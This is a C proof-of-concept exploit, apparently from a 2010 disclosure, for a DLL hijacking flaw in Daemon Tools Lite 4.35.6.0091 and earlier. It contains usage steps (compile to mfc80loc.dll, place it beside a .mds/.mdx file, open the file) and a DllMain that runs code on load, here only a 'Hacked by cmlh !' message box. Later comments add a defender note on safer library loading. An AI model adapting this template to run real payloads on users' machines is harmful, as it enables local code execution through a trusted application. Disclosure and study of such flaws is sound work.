/*

Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit

	Found by: Christian Heinrich (cmlh)
	Exploit by: Christian Heinrich (cmlh)

	Email: christianheinrich@live.com
	Web: http://www.twitter.com/cmlh

	Summary: Daemon Tools is a disk image mounting application for Microsoft Windows.

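	Description: Daemon Tools suffers from a DLL hijacking (insecure
	library search path) vulnerability. Opening a .MDS or .MDX file
	causes mfc80loc.dll to be loaded from the folder that contains
	that file, so code in a DLL placed there executes locally inside
	the Daemon Tools process.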

----

Howto:

gcc -shared -o mfc80loc.dll daemontoolsexploit.c

Compile this file and rename to mfc80loc.dll

Then create an empty file named anything.mds or anything.mdx, or use a
legitimate image.

Double clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute
our code.

----

Tested on Microsoft Windows 7 / XP sp 3

Vulnerability discovered by Christian Heinrich (cmlh)


christianheinrich@live.com

27.08.2010

*/


#include <windows.h>

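/*
 * dll_mll() is defined after DllMain. Without this prototype the call below
 * relies on an implicit declaration, which is invalid since C99 and an error
 * in C++.
 */
int dll_mll(void);

/*
 * DllMain - entry point the Windows loader calls when this DLL is mapped into
 * or removed from a process, and when threads start or exit.
 *
 * hinstDLL    - module handle of this DLL (unused).
 * fdwReason   - why the loader is calling (one of the DLL_* reason codes).
 * lpvReserved - loader-supplied context (unused).
 *
 * Returns TRUE in every case, so the load is reported as successful.
 *
 * Only DLL_PROCESS_ATTACH does any work: it calls dll_mll(), whose message
 * box is the visible proof that the host process loaded this file instead of
 * the library it expected. The remaining reasons are deliberate no-ops.
 *
 * NOTE(review): DllMain runs while the loader lock is held, and Microsoft's
 * guidance is to avoid User32 calls such as MessageBox here. The call is kept
 * because this file exists only to demonstrate that the load happened.
 *
 * For defenders: this class of issue is closed on the application side by
 * loading libraries through fully qualified paths and by removing the current
 * directory from the search order (SetDllDirectory("") or
 * SetDefaultDllDirectories), so the fix belongs in the host application.
 */
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
			dll_mll();
			/* Explicit break: the original fell through to the no-op cases. */
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}

	return TRUE;
}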

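/*
 * dll_mll - show a modal message box as the proof-of-load marker.
 *
 * The box has no owner window (first argument 0) and a single OK button.
 * Its result is not inspected.
 *
 * Returns 0 always. The original declared an int return type but fell off the
 * end of the function, leaving the returned value undefined.
 */
int dll_mll(void)
{
	MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK);
	return 0;
}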